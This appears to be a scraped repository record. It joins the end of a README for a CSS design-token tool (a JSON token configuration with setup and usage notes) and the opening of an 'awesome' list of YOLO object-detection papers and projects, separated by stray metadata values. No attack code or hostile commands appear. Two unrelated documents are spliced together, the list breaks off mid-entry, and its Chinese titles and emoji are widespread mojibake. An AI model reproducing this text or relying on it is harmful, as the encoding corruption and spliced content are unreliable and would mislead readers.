}, "2xl": { "value": "2rem" }, "3xl": { "value": "3rem" }, "4xl": { "value": "4rem" }, "5xl": { "value": "5rem" }, "6xl": { "value": "7.5rem" }, "7xl": { "value": "10rem" }, "8xl": { "value": "15rem" }, "9xl": { "value": "20rem" }, "10xl": { "value": "30rem" } }, "size": { "full": { "value": "100%" }, "2xs": { "value": ".25rem" }, "xs": { "value": ".5rem" }, "sm": { "value": "1rem" }, "md": { "value": "1.25rem" }, "lg": { "value": "1.5rem" }, "xl": { "value": "1.75rem" }, "2xl": { "value": "2rem" }, "3xl": { "value": "3rem" }, "4xl": { "value": "4rem" }, "5xl": { "value": "5rem" }, "6xl": { "value": "7.5rem" }, "7xl": { "value": "10rem" }, "8xl": { "value": "15rem" }, "9xl": { "value": "20rem" }, "10xl": { "value": "30rem" } }, "width": { "screen": { "value": "100vw" } }, "height": { "screen": { "value": "100vh" } }, "radius": { "none": { "value": "0px" }, "sm": { "value": "0.125rem" }, "default": { "value": "0.25rem" }, "md": { "value": "0.375rem" }, "lg": { "value": "0.5rem" }, "xl": { "value": "0.75rem" }, "2xl": { "value": "1rem" }, "3xl": { "value": "1.5rem" }, "full": { "value": "9999px" } }, "shadow": { "default": { "value": [ { "offset-x": "0px", "offset-y": "1px", "blur": "3px", "spread": "0px", "color": "#000", "opacity": 0.1 }, { "offset-x": "0px", "offset-y": "1px", "blur": "2px", "spread": "-1px", "color": "#000", "opacity": 0.1 } ] } }, "font": { "sans": { "value": [ "system-ui", "-apple-system", "Segoe UI", "Roboto", "Ubuntu", "Cantarell", "Noto Sans", "sans-serif" ] } }, "font-size": { "xs": { "value": "0.75rem" }, "sm": { "value": "0.875rem" }, "default": { "value": "1rem" }, "lg": { "value": "1.125rem" }, "xl": { "value": "1.25rem" }, "2xl": { "value": "1.5rem" }, "3xl": { "value": "1.875rem" }, "4xl": { "value": "2.25rem" }, "5xl": { "value": "3rem" }, "6xl": { "value": "3.75rem" }, "7xl": { "value": "4.5rem" }, "8xl": { "value": "6rem" }, "9xl": { "value": "8rem" } }, "font-weight": { "thin": { "value": 100 }, "extralight": { "value": 200 }, "light": { "value": 300 }, "normal": { "value": 400 }, "medium": { "value": 500 }, "semibold": { "value": 600 }, "bold": { "value": 700 }, "extrabold": { "value": 800 }, "black": { "value": 900 } }, "line-height": { "none": { "value": 1 }, "tight": { "value": 1.25 }, "snug": { "value": 1.375 }, "normal": { "value": 1.5 }, "relaxed": { "value": 1.625 }, "loose": { "value": 2 } }, "letter-spacing": { "tighter": { "value": "-0.05em" }, "tight": { "value": "-0.025em" }, "normal": { "value": "0em" }, "wide": { "value": "0.025em" }, "wider": { "value": "0.05em" }, "widest": { "value": "0.1em" } }, "easing": { "cubic": { "in": { "value": [0.32, 0, 0.67, 0] }, "out": { "value": [0.33, 1, 0.68, 1] }, "in-out": { "value": [0.65, 0, 0.35, 1] } } } } ``` ## Setup > **Note:** Using Astro? You can skip this step! Token variables are automatically injected by the integration. If you are using our plain PostCSS setup, you should include the following line in the root of your stylesheet. This will inject `--custom-property` declarations for all of your tokens. ```css @inject "tokencss:base"; ``` ## Usage You're ready to use tokens in your CSS! ```css .box { background: red.5; border-radius: md; width: lg; height: lg; /* Custom Properties are also supported! */ --color: blue.6; --margin: sm; } ``` ## Editor integration Be sure to install our [Visual Studio Code](https://marketplace.visualstudio.com/items?itemName=tokencss.tokencss-vscode) extension for the best experience.
null
null
13
1
9
66
19
3
1
codingonion/awesome-yolo-object-detection
# Awesome-YOLO-Object-Detection [![Awesome](https://cdn.rawgit.com/sindresorhus/awesome/d7305f38d29fed78fa85652e3a63e154dd8e8829/media/badge.svg)](https://github.com/sindresorhus/awesome) ๐Ÿš€๐Ÿš€๐Ÿš€ YOLO is a great real-time one-stage object detection framework. This repository lists some awesome public YOLO object detection series projects. ## Contents - [Awesome-YOLO-Object-Detection](#awesome-yolo-object-detection) - [Summary](#summary) - [Official YOLO](#official-yolo) - [Awesome List](#awesome-list) - [Paper and Code Overview](#paper-and-code-overview) - [Paper Review](#paper-review) - [Code Review](#code-review) - [Learning Resources](#learning-resources) - [Extensional Frameworks](#extensional-frameworks) - [Other Versions of YOLO](#other-versions-of-yolo) - [PyTorch Implementation](#pytorch-implementation) - [C Implementation](#c-implementation) - [CPP Implementation](#cpp-implementation) - [ROS Implementation](#ros-implementation) - [Mojo Implementation](#mojo-implementation) - [Rust Implementation](#rust-implementation) - [Go Implementation](#go-implementation) - [CSharp Implementation](#csharp-implementation) - [Tensorflow and Keras Implementation](#tensorflow-and-keras-implementation) - [PaddlePaddle Implementation](#paddlepaddle-implementation) - [Caffe Implementation](#caffe-implementation) - [MXNet Implementation](#mxnet-implementation) - [Web Implementation](#web-implementation) - [Others](#others) - [Lighter and Deployment Frameworks](#lighter-and-deployment-frameworks) - [Lightweight Backbones and FPN](#lightweight-backbones-and-fpn) - [Pruning Knoweldge-Distillation Quantization](#pruning-knoweldge-distillation-quantization) - [Pruning](#pruning) - [Quantization](#quantization) - [Knoweldge-Distillation](#knoweldge-distillation) - [High-performance Inference Engine](#high-performance-inference-engine) - [ONNX](#onnx) - [TensorRT](#tensorrt) - [OpenVINO](#openvino) - [NCNN](#ncnn) - [MNN](#mnn) - [DeepStream](#deepstream) - [Other Engine](#other-engine) - [FPGA TPU NPU Hardware Deployment](#fpga-tpu-npu-hardware-deployment) - [FPGA](#fpga) - [Other Hardware](#other-hardware) - [Applications](#applications) - [Video Object Detection](#video-object-detection) - [Object Tracking](#object-tracking) - [Multi-Object Tracking](#multi-object-tracking) - [Dynamic Object Tracking](#Dynamic-object-tracking) - [Deep Reinforcement Learning](#deep-reinforcement-learning) - [Motion Control Field](#motion-control-field) - [Super-Resolution Field](#super-resolution-field) - [Spiking Neural Network](#spiking-neural-network) - [Attention and Transformer](#attention-and-transformer) - [Small Object Detection](#small-object-detection) - [Few-shot Object Detection](#few-shot-object-detection) - [Open World Object Detection](#open-world-object-detection) - [Oriented Object Detection](#oriented-object-detection) - [Face Detection and Recognition](#face-detection-and-recognition) - [Face Detection](#face-detection) - [Face Recognition](#face-recognition) - [Face Mask Detection](#face-mask-detection) - [Social Distance Detection](#social-distance-detection) - [Autonomous Driving Field Detection](#autonomous-driving-field-detection) - [Vehicle Detection](#vehicle-detection) - [License Plate Detection and Recognition](#license-plate-detection-and-recognition) - [Lane Detection](#lane-detection) - [Driving Behavior Detection](#driving-behavior-detection) - [Parking Slot Detection](#parking-slot-detection) - [Traffic Light Detection](#traffic-light-detection) - [Traffic Sign Detection](#traffic-sign-detection) - [Crosswalk Detection](#crosswalk-detection) - [Traffic Accidents Detection](#traffic-accidents-detection) - [Road Damage Detection](#road-damage-detection) - [Animal Detection](#animal-detection) - [Helmet Detection](#helmet-detection) - [Hand Detection](#hand-detection) - [Gesture Recognition](#gesture-recognition) - [Action Detection](#action-detection) - [Emotion Recognition](#emotion-recognition) - [Human Pose Estimation](#human-pose-estimation) - [Distance Measurement](#distance-measurement) - [Instance and Semantic Segmentation](#instance-and-semantic-segmentation) - [3D Object Detection](#3d-object-detection) - [SLAM Field Detection](#slam-field-detection) - [Industrial Defect Detection](#industrial-defect-detection) - [SAR Image Detection](#sar-image-detection) - [Multispectral Image Fusion Detection](#multispectral-image-fusion-detection) - [Safety Monitoring Field Detection](#safety-monitoring-field-detection) - [Medical Field Detection](#medical-field-detection) - [Chemistry Field Detection](#chemistry-field-detection) - [Agricultural Field Detection](#agricultural-field-detection) - [Sports Field Detection](#sports-field-detection) - [Adverse Weather Conditions](#adverse-weather-conditions) - [Adversarial Attack and Defense](#adversarial-attack-and-defense) - [Game Field Detection](#game-field-detection) - [Automatic Annotation Tools](#automatic-annotation-tools) - [Feature Map Visualization](#feature-map-visualization) - [Object Detection Evaluation Metrics](#object-detection-evaluation-metrics) - [GUI](#gui) - [Streamlit-Related](#streamlit-related) - [Gradio-Related](#gradio-related) - [QT-Related](#qt-related) - [PySide-Related](#pyside-related) - [Flutter-Related](#flutter-related) - [Slint-Related](#slint-related) - [Other Applications](#other-applications) - [Blogs](#blogs) - [Videos](#videos) ## Summary - ### Official YOLO - [YOLOv1](https://pjreddie.com/darknet/yolov1) ([Darknet](https://github.com/pjreddie/darknet) <img src="https://img.shields.io/github/stars/pjreddie/darknet?style=social"/>) : "You Only Look Once: Unified, Real-Time Object Detection". (**[CVPR 2016](https://www.cv-foundation.org/openaccess/content_cvpr_2016/html/Redmon_You_Only_Look_CVPR_2016_paper.html)**) - [YOLOv2](https://pjreddie.com/darknet/yolov2) ([Darknet](https://github.com/pjreddie/darknet) <img src="https://img.shields.io/github/stars/pjreddie/darknet?style=social"/>) : "YOLO9000: Better, Faster, Stronger". (**[CVPR 2017](https://openaccess.thecvf.com/content_cvpr_2017/html/Redmon_YOLO9000_Better_Faster_CVPR_2017_paper.html)**) - [YOLOv3](https://pjreddie.com/darknet/yolo) ([Darknet](https://github.com/pjreddie/darknet) <img src="https://img.shields.io/github/stars/pjreddie/darknet?style=social"/>) : "YOLOv3: An Incremental Improvement". (**[arXiv 2018](https://arxiv.org/abs/1804.02767)**) - [YOLOv4](https://github.com/AlexeyAB/darknet) <img src="https://img.shields.io/github/stars/AlexeyAB/darknet?style=social"/> ([WongKinYiu/PyTorch_YOLOv4](https://github.com/WongKinYiu/PyTorch_YOLOv4) <img src="https://img.shields.io/github/stars/WongKinYiu/PyTorch_YOLOv4?style=social"/>) : "YOLOv4: Optimal Speed and Accuracy of Object Detection". (**[arXiv 2020](https://arxiv.org/abs/2004.10934)**) - [Scaled-YOLOv4](https://github.com/AlexeyAB/darknet) <img src="https://img.shields.io/github/stars/AlexeyAB/darknet?style=social"/> ([WongKinYiu/ScaledYOLOv4](https://github.com/WongKinYiu/ScaledYOLOv4) <img src="https://img.shields.io/github/stars/WongKinYiu/ScaledYOLOv4?style=social"/>) : "Scaled-YOLOv4: Scaling Cross Stage Partial Network". (**[CVPR 2021](https://openaccess.thecvf.com/content/CVPR2021/html/Wang_Scaled-YOLOv4_Scaling_Cross_Stage_Partial_Network_CVPR_2021_paper.html)**) - [YOLOv5](https://github.com/ultralytics/yolov5) <img src="https://img.shields.io/github/stars/ultralytics/yolov5?style=social"/> : YOLOv5 ๐Ÿš€ in PyTorch > ONNX > CoreML > TFLite. [docs.ultralytics.com](https://docs.ultralytics.com/). YOLOv5 ๐Ÿš€ is the world's most loved vision AI, representing [Ultralytics](https://ultralytics.com/) open-source research into future vision AI methods, incorporating lessons learned and best practices evolved over thousands of hours of research and development. - [YOLOX](https://github.com/Megvii-BaseDetection/YOLOX) <img src="https://img.shields.io/github/stars/Megvii-BaseDetection/YOLOX?style=social"/> : "YOLOX: Exceeding YOLO Series in 2021". (**[arXiv 2021](https://arxiv.org/abs/2107.08430)**) - [YOLOR](https://github.com/WongKinYiu/yolor) <img src="https://img.shields.io/github/stars/WongKinYiu/yolor?style=social"/> : "You Only Learn One Representation: Unified Network for Multiple Tasks". (**[arXiv 2021](https://arxiv.org/abs/2105.04206)**) - [YOLOF](https://github.com/megvii-model/YOLOF) <img src="https://img.shields.io/github/stars/megvii-model/YOLOF?style=social"/> : "You Only Look One-level Feature". (**[CVPR 2021](https://openaccess.thecvf.com/content/CVPR2021/html/Chen_You_Only_Look_One-Level_Feature_CVPR_2021_paper.html)**). "ๅพฎไฟกๅ…ฌไผ—ๅทใ€Œ่ฎก็ฎ—ๆœบ่ง†่ง‰็ ”็ฉถ้™ขใ€ใ€Š[CVPR็›ฎๆ ‡ๆฃ€ๆต‹ๆ–ฐๆก†ๆžถ๏ผšไธๅ†ๆ˜ฏYOLO๏ผŒ่€Œๆ˜ฏๅช้œ€่ฆไธ€ๅฑ‚็‰นๅพ๏ผˆๅนฒ่ดงๆปกๆปก๏ผŒๅปบ่ฎฎๆ”ถ่—๏ผ‰](https://mp.weixin.qq.com/s/5sTxdjhKIPpQ-rCsWfe80A)ใ€‹"ใ€‚ - [YOLOS](https://github.com/hustvl/YOLOS) <img src="https://img.shields.io/github/stars/hustvl/YOLOS?style=social"/> : "You Only Look at One Sequence: Rethinking Transformer in Vision through Object Detection". (**[NeurIPS 2021](https://proceedings.neurips.cc//paper/2021/hash/dc912a253d1e9ba40e2c597ed2376640-Abstract.html)**) - [YOLOv6](https://github.com/meituan/YOLOv6) <img src="https://img.shields.io/github/stars/meituan/YOLOv6?style=social"/> : "YOLOv6: A Single-Stage Object Detection Framework for Industrial Applications". (**[arXiv 2022](https://arxiv.org/abs/2209.02976)**). "ๅพฎไฟกๅ…ฌไผ—ๅทใ€Œ็พŽๅ›ขๆŠ€ๆœฏๅ›ข้˜Ÿใ€ใ€Š[YOLOv6๏ผšๅˆๅฟซๅˆๅ‡†็š„็›ฎๆ ‡ๆฃ€ๆต‹ๆก†ๆžถๅผ€ๆบๅ•ฆ](https://mp.weixin.qq.com/s/RrQCP4pTSwpTmSgvly9evg)ใ€‹"ใ€‚"ๅพฎไฟกๅ…ฌไผ—ๅทใ€Œ็พŽๅ›ขๆŠ€ๆœฏๅ›ข้˜Ÿใ€ใ€Š[็›ฎๆ ‡ๆฃ€ๆต‹ๅผ€ๆบๆก†ๆžถYOLOv6ๅ…จ้ขๅ‡็บง๏ผŒๆ›ดๅฟซๆ›ดๅ‡†็š„2.0็‰ˆๆœฌๆฅๅ•ฆ](https://mp.weixin.qq.com/s/9FyvWrHErfgJrVXIC_PKqg)ใ€‹"ใ€‚"ๅพฎไฟกๅ…ฌไผ—ๅทใ€Œ็พŽๅ›ขๆŠ€ๆœฏๅ›ข้˜Ÿใ€ใ€Š[้€š็”จ็›ฎๆ ‡ๆฃ€ๆต‹ๅผ€ๆบๆก†ๆžถYOLOv6ๅœจ็พŽๅ›ข็š„้‡ๅŒ–้ƒจ็ฝฒๅฎžๆˆ˜ ](https://mp.weixin.qq.com/s/J-3saNkCCAHLjkZQ3VCaeQ)ใ€‹"ใ€‚ "ๅพฎไฟกๅ…ฌไผ—ๅทใ€Œ้›†ๆ™บไนฆ็ซฅใ€ใ€Š[่ถ…่ถŠYOLOv7 | YOLOv6่ฎบๆ–‡ๆ”พๅ‡บ๏ผŒ้‡ๅ‚+่‡ช่’ธ้ฆ+ๆ„Ÿ็Ÿฅ้‡ๅŒ–+...ๅ„็งTricksๅคงๆ”พๅผ‚ๅฝฉ](https://mp.weixin.qq.com/s/DPHC7bO1Q-IKDUqPU7DSJA)ใ€‹"ใ€‚"ๅพฎไฟกๅ…ฌไผ—ๅทใ€Œๆžๅธ‚ๅนณๅฐใ€ใ€Š[Repvgg-style ConvNets๏ผŒ็กฌไปถๅ‹ๅฅฝ๏ผ่ฏฆ่งฃYOLOv6็š„้ซ˜ๆ•ˆbackbone๏ผšEfficientRep](https://mp.weixin.qq.com/s/2Md30QdqgWnWwVR7d4sx1Q)ใ€‹"ใ€‚ - [YOLOv7](https://github.com/WongKinYiu/yolov7) <img src="https://img.shields.io/github/stars/WongKinYiu/yolov7?style=social"/> : "YOLOv7: Trainable bag-of-freebies sets new state-of-the-art for real-time object detectors". (**[CVPR 2023](https://arxiv.org/abs/2207.02696)**). "ๅพฎไฟกๅ…ฌไผ—ๅทใ€ŒCVerใ€ใ€Š[CVPR 2023 | YOLOv7ๅผบๅŠฟๆ”ถๅฝ•๏ผๆ—ถ้š”6ๅนด๏ผŒYOLOv็ณปๅˆ—ๅ†็™ปCVPR๏ผ](https://mp.weixin.qq.com/s/HjaszZYPLoV03Z4Rw9KiCg)ใ€‹"ใ€‚ - [DAMO-YOLO](https://github.com/tinyvision/DAMO-YOLO) <img src="https://img.shields.io/github/stars/tinyvision/DAMO-YOLO?style=social"/> : DAMO-YOLO: a fast and accurate object detection method with some new techs, including NAS backbones, efficient RepGFPN, ZeroHead, AlignedOTA, and distillation enhancement. "DAMO-YOLO : A Report on Real-Time Object Detection Design". (**[arXiv 2022](https://arxiv.org/abs/2211.15444)**) - [DynamicDet](https://github.com/VDIGPKU/DynamicDet) <img src="https://img.shields.io/github/stars/VDIGPKU/DynamicDet?style=social"/> : "DynamicDet: A Unified Dynamic Architecture for Object Detection". (**[CVPR 2023](https://arxiv.org/abs/2304.05552)**) - [EdgeYOLO](https://github.com/LSH9832/edgeyolo) <img src="https://img.shields.io/github/stars/LSH9832/edgeyolo?style=social"/> : EdgeYOLO: anchor-free, edge-friendly. an edge-real-time anchor-free object detector with decent performance. "Edge YOLO: Real-time intelligent object detection system based on edge-cloud cooperation in autonomous vehicles". (**[IEEE Transactions on Intelligent Transportation Systems, 2022](https://ieeexplore.ieee.org/abstract/document/9740044)**). "EdgeYOLO: An Edge-Real-Time Object Detector". (**[arXiv 2023](https://arxiv.org/abs/2302.07483)**) - [RT-DETR](https://github.com/PaddlePaddle/PaddleDetection/tree/develop/configs/rtdetr) <img src="https://img.shields.io/github/stars/PaddlePaddle/PaddleDetection?style=social"/> : "DETRs Beat YOLOs on Real-time Object Detection". (**[arXiv 2023](https://arxiv.org/abs/2304.08069)**). "ๅพฎไฟกๅ…ฌไผ—ๅทใ€Œ้›†ๆ™บไนฆ็ซฅใ€ใ€Š[YOLO่ถ…ๅฟซๆ—ถไปฃ็ปˆ็ป“ไบ† | RT-DETR็”จ114FPSๅฎž็Žฐ54.8AP๏ผŒ่ฟœ่ถ…YOLOv8](https://mp.weixin.qq.com/s/V3MUXinJhpq8J4UWTUL17w)ใ€‹"ใ€‚ - [YOLO-NAS](https://github.com/Deci-AI/super-gradients) <img src="https://img.shields.io/github/stars/Deci-AI/super-gradients?style=social"/> : Easily train or fine-tune SOTA computer vision models with one open source training library. The home of [Yolo-NAS](https://github.com/Deci-AI/super-gradients/blob/master/YOLONAS.md). [www.supergradients.com](https://www.supergradients.com/). YOLO-NAS: A Next-Generation, Object Detection Foundational Model generated by Deciโ€™s Neural Architecture Search Technology. Deci is thrilled to announce the release of a new object detection model, YOLO-NAS - a game-changer in the world of object detection, providing superior real-time object detection capabilities and production-ready performance. Deci's mission is to provide AI teams with tools to remove development barriers and attain efficient inference performance more quickly. The new YOLO-NAS delivers state-of-the-art (SOTA) performance with the unparalleled accuracy-speed performance, outperforming other models such as YOLOv5, YOLOv6, YOLOv7 and YOLOv8. - [YOLO-World](https://github.com/AILab-CVC/YOLO-World) <img src="https://img.shields.io/github/stars/AILab-CVC/YOLO-World?style=social"/> : "YOLO-World: Real-Time Open-Vocabulary Object Detection". (**[CVPR 2024](https://arxiv.org/abs/2401.17270)**). [www.yoloworld.cc](https://www.yoloworld.cc/) - [YOLOv8](https://github.com/ultralytics/ultralytics) <img src="https://img.shields.io/github/stars/ultralytics/ultralytics?style=social"/> : NEW - YOLOv8 ๐Ÿš€ in PyTorch > ONNX > CoreML > TFLite. [Ultralytics](https://ultralytics.com/) [YOLOv8](https://github.com/ultralytics/ultralytics) is a cutting-edge, state-of-the-art (SOTA) model that builds upon the success of previous YOLO versions and introduces new features and improvements to further boost performance and flexibility. YOLOv8 is designed to be fast, accurate, and easy to use, making it an excellent choice for a wide range of object detection and tracking, instance segmentation, image classification and pose estimation tasks. [docs.ultralytics.com](https://docs.ultralytics.com/) - [YOLOv9](https://github.com/WongKinYiu/yolov9) <img src="https://img.shields.io/github/stars/WongKinYiu/yolov9?style=social"/> : "YOLOv9: Learning What You Want to Learn Using Programmable Gradient Information". (**[arXiv 2024](https://arxiv.org/abs/2402.13616)**) - [YOLOv10](https://github.com/THU-MIG/yolov10) <img src="https://img.shields.io/github/stars/THU-MIG/yolov10?style=social"/> : "YOLOv10: Real-Time End-to-End Object Detection". (**[arXiv 2024](https://arxiv.org/abs/2405.14458v1)**) - [LeYOLO](https://github.com/LilianHollard/LeYOLO) <img src="https://img.shields.io/github/stars/LilianHollard/LeYOLO?style=social"/> : "LeYOLO, New Scalable and Efficient CNN Architecture for Object Detection". (**[arXiv 2024](https://arxiv.org/abs/2406.14239)**) - ### Awesome List - [awesome-yolo-object-detection](https://github.com/codingonion/awesome-yolo-object-detection) <img src="https://img.shields.io/github/stars/codingonion/awesome-yolo-object-detection?style=social"/> : ๐Ÿš€๐Ÿš€๐Ÿš€ A collection of some awesome YOLO object detection series projects. - [srebroa/awesome-yolo](https://github.com/srebroa/awesome-yolo) <img src="https://img.shields.io/github/stars/srebroa/awesome-yolo?style=social"/> : ๐Ÿš€ โญ The list of the most popular YOLO algorithms - awesome YOLO. - [Bubble-water/YOLO-Summary](https://github.com/Bubble-water/YOLO-Summary) <img src="https://img.shields.io/github/stars/Bubble-water/YOLO-Summary?style=social"/> : YOLO-Summary. - [WZMIAOMIAO/deep-learning-for-image-processing](https://github.com/WZMIAOMIAO/deep-learning-for-image-processing) <img src="https://img.shields.io/github/stars/WZMIAOMIAO/deep-learning-for-image-processing?style=social"/> : deep learning for image processing including classification and object-detection etc. - [hoya012/deep_learning_object_detection](https://github.com/hoya012/deep_learning_object_detection) <img src="https://img.shields.io/github/stars/hoya012/deep_learning_object_detection?style=social"/> : A paper list of object detection using deep learning. - [amusi/awesome-object-detection](https://github.com/amusi/awesome-object-detection) <img src="https://img.shields.io/github/stars/amusi/awesome-object-detection?style=social"/> : Awesome Object Detection. - ### Paper and Code Overview - #### Paper Review - [52CV/CV-Surveys](https://github.com/52CV/CV-Surveys) <img src="https://img.shields.io/github/stars/52CV/CV-Surveys?style=social"/> : ่ฎก็ฎ—ๆœบ่ง†่ง‰็›ธๅ…ณ็ปผ่ฟฐใ€‚ๅŒ…ๆ‹ฌ็›ฎๆ ‡ๆฃ€ๆต‹ใ€่ทŸ่ธช........ - [GreenTeaHua/YOLO-Review](https://github.com/GreenTeaHua/YOLO-Review) <img src="https://img.shields.io/github/stars/GreenTeaHua/YOLO-Review?style=social"/> : "A Review of YOLO Object Detection Based on Deep Learning". "ๅŸบไบŽๆทฑๅบฆๅญฆไน ็š„YOLO็›ฎๆ ‡ๆฃ€ๆต‹็ปผ่ฟฐ". (**[Journal of Electronics & Information Technology 2022](https://jeit.ac.cn/cn/article/doi/10.11999/JEIT210790)**) - "A Review of Yolo Algorithm Developments". (**[Procedia Computer Science 2022](https://www.sciencedirect.com/science/article/pii/S1877050922001363)**) - #### Code Review - [MMDetection](https://github.com/open-mmlab/mmdetection) <img src="https://img.shields.io/github/stars/open-mmlab/mmdetection?style=social"/> : OpenMMLab Detection Toolbox and Benchmark. [mmdetection.readthedocs.io](https://mmdetection.readthedocs.io/en/latest/). (**[arXiv 2019](https://arxiv.org/abs/1906.07155)**) - [MMYOLO](https://github.com/open-mmlab/mmyolo) <img src="https://img.shields.io/github/stars/open-mmlab/mmyolo?style=social"/> : OpenMMLab YOLO series toolbox and benchmark. Implemented RTMDet, RTMDet-Rotated,YOLOv5, YOLOv6, YOLOv7, YOLOv8, YOLOX, PPYOLOE, etc. [mmyolo.readthedocs.io/zh_CN/dev/](https://mmyolo.readthedocs.io/zh_CN/dev/) - [ultralyticsPro](https://github.com/iscyy/ultralyticsPro) <img src="https://img.shields.io/github/stars/iscyy/ultralyticsPro?style=social"/> : ๐Ÿ”ฅ๐Ÿ”ฅ๐Ÿ”ฅไธ“ๆณจไบŽๆ”น่ฟ›YOLOv8ๆจกๅž‹๏ผŒNEW - YOLOv8 ๐Ÿš€ RT-DETR ๐Ÿฅ‡ in PyTorch >, Support to improve backbone, neck, head, loss, IoU, NMS and other modules๐Ÿš€ - [YOLOAir](https://github.com/iscyy/yoloair) <img src="https://img.shields.io/github/stars/iscyy/yoloair?style=social"/> : YOLO Air : Makes improvements easy again. ๐Ÿ”ฅ๐Ÿ”ฅ๐Ÿ”ฅYOLOv5, YOLOv6, YOLOv7, YOLOv8, PPYOLOE, YOLOX, YOLOR, YOLOv4, YOLOv3, Transformer, Attention, TOOD and Improved-YOLOv5-YOLOv7... Support to improve backbone, neck, head, loss, IoU, NMS and other modules๐Ÿš€. YOLOAirๆ˜ฏไธ€ไธชๅŸบไบŽPyTorch็š„YOLO็ฎ—ๆณ•ๅบ“ใ€‚็ปŸไธ€ๆจกๅž‹ไปฃ็ ๆก†ๆžถใ€็ปŸไธ€ๅบ”็”จใ€็ปŸไธ€ๆ”น่ฟ›ใ€ๆ˜“ไบŽๆจกๅ—็ป„ๅˆใ€ๆž„ๅปบๆ›ดๅผบๅคง็š„็ฝ‘็ปœๆจกๅž‹ใ€‚ "ๅพฎไฟกๅ…ฌไผ—ๅทใ€ŒFightingCVใ€ใ€Š[YOLOAir | ้ขๅ‘ๅฐ็™ฝ็š„็›ฎๆ ‡ๆฃ€ๆต‹ๅบ“๏ผŒๆ›ดๅฟซๆ›ดๆ–นไพฟๆ›ดๅฎŒๆ•ด็š„YOLOๅบ“](https://mp.weixin.qq.com/s/smwx-Ievs3rWMw_D4lSwqg)ใ€‹"ใ€‚ "ๅพฎไฟกๅ…ฌไผ—ๅทใ€Œๆˆ‘็ˆฑ่ฎก็ฎ—ๆœบ่ง†่ง‰ใ€ใ€Š[้›†ๆˆๅคš็งYOLOๆ”น่ฟ›็‚น๏ผŒ้ขๅ‘ๅฐ็™ฝ็ง‘็ ”็š„YOLOๆฃ€ๆต‹ไปฃ็ ๅบ“YOLOAir](https://mp.weixin.qq.com/s/EEJrnfnTn7wAcEpVPx06BQ)ใ€‹" - [YOLOAir2](https://github.com/iscyy/yoloair2) <img src="https://img.shields.io/github/stars/iscyy/yoloair2?style=social"/> : YOLOAir2โ˜๏ธ๐Ÿ’ก๐ŸŽˆ : Makes improvements easy again. โ˜๏ธ๐Ÿ’ก๐ŸŽˆYOLOAir2 is the second version of the YOLOAir series, The framework is based on YOLOv7, including YOLOv7, YOLOv8, YOLOv6, YOLOv5, YOLOX, YOLOR, YOLOv4, YOLOv3, Transformer, Attention and Improved-YOLOv7... Support to improve Backbone, Neck, Head, Loss, IoU, NMS and other modules. - [YOLOU](https://github.com/jizhishutong/YOLOU) <img src="https://img.shields.io/github/stars/jizhishutong/YOLOU?style=social"/> : YOLOU๏ผšUnited, Study and easier to Deploy. โ€‹ The purpose of our creation of YOLOU is to better learn the algorithms of the YOLO series and pay tribute to our predecessors. YOLOv3ใ€YOLOv4ใ€YOLOv5ใ€YOLOv5-Liteใ€YOLOv6-v1ใ€YOLOv6-v2ใ€YOLOv7ใ€YOLOXใ€YOLOX-Liteใ€PP-YOLOEใ€PP-PicoDet-Plusใ€YOLO-Fastest v2ใ€FastestDetใ€YOLOv5-SPDใ€TensorRTใ€NCNNใ€Tengineใ€OpenVINO. "ๅพฎไฟกๅ…ฌไผ—ๅทใ€Œ้›†ๆ™บไนฆ็ซฅใ€ใ€Š[YOLOUๅผ€ๆบ | ๆฑ‡้›†YOLO็ณปๅˆ—ๆ‰€ๆœ‰็ฎ—ๆณ•๏ผŒ้›†็ฎ—ๆณ•ๅญฆไน ใ€็ง‘็ ”ๆ”น่ฟ›ใ€่ฝๅœฐไบŽไธ€่บซ๏ผ](https://mp.weixin.qq.com/s/clupheQ8iHnhR4FJcTtB8A)ใ€‹" - [YOLOMagic](https://github.com/WangQvQ/Yolov5_Magic) <img src="https://img.shields.io/github/stars/WangQvQ/Yolov5_Magic?style=social"/> : YOLO Magic๐Ÿช„ is an extension based on Ultralytics' YOLOv5, designed to provide more powerful functionality and simpler operations for visual tasks. - [positive666/yolo_research](https://github.com/positive666/yolo_research) <img src="https://img.shields.io/github/stars/positive666/yolo_research?style=social"/> : ๐Ÿš€ yolo_reserach PLUS High-level. based on yolo-high-level project (detect\pose\classify\segment\):include yolov5\yolov7\yolov8\ core ,improvement research ,SwintransformV2 and Attention Series. training skills, business customization, engineering deployment. - [augmentedstartups/AS-One](https://github.com/augmentedstartups/AS-One) <img src="https://img.shields.io/github/stars/augmentedstartups/AS-One?style=social"/> : Easy & Modular Computer Vision Detectors and Trackers - Run YOLO-NAS,v8,v7,v6,v5,R,X in under 20 lines of code. [www.augmentedstartups.com](https://www.augmentedstartups.com/) - [Oneflow-Inc/one-yolov5](https://github.com/Oneflow-Inc/one-yolov5) <img src="https://img.shields.io/github/stars/Oneflow-Inc/one-yolov5?style=social"/> : A more efficient yolov5 with oneflow backend ๐ŸŽ‰๐ŸŽ‰๐ŸŽ‰. "ๅพฎไฟกๅ…ฌไผ—ๅทใ€ŒGiantPandaCVใ€ใ€Š[One-YOLOv5 ๅ‘ๅธƒ๏ผŒไธ€ไธช่ฎญๅพ—ๆ›ดๅฟซ็š„YOLOv5](https://mp.weixin.qq.com/s/tZ7swUd0biz7G3CiRkHHfw)ใ€‹" - [PaddleYOLO](https://github.com/PaddlePaddle/PaddleYOLO) <img src="https://img.shields.io/github/stars/PaddlePaddle/PaddleYOLO?style=social"/> : ๐Ÿš€๐Ÿš€๐Ÿš€ YOLO series of PaddlePaddle implementation, PP-YOLOE+, YOLOv5, YOLOv6, YOLOv7, YOLOv8, YOLOX, YOLOv5u, YOLOv7u, RTMDet and so on. ๐Ÿš€๐Ÿš€๐Ÿš€ - [BestYOLO](https://github.com/WangRongsheng/BestYOLO) <img src="https://img.shields.io/github/stars/WangRongsheng/BestYOLO?style=social"/> : ๐ŸŒŸChange the world, it will become a better place. | ไปฅ็ง‘็ ”ๅ’Œ็ซž่ต›ไธบๅฏผๅ‘็š„ๆœ€ๅฅฝ็š„YOLOๅฎž่ทตๆก†ๆžถ! - [Cver4s](https://github.com/KangChou/Cver4s) <img src="https://img.shields.io/github/stars/KangChou/Cver4s?style=social"/> : Cver4s๏ผšComputer vision algorithm code base. - ### Learning Resources - [KuiperInfer (่‡ชๅˆถๆทฑๅบฆๅญฆไน ๆŽจ็†ๆก†ๆžถ)](https://github.com/zjhellofss/KuiperInfer) <img src="https://img.shields.io/github/stars/zjhellofss/KuiperInfer?style=social"/> : ๅธฆไฝ ไปŽ้›ถๅฎž็Žฐไธ€ไธช้ซ˜ๆ€ง่ƒฝ็š„ๆทฑๅบฆๅญฆไน 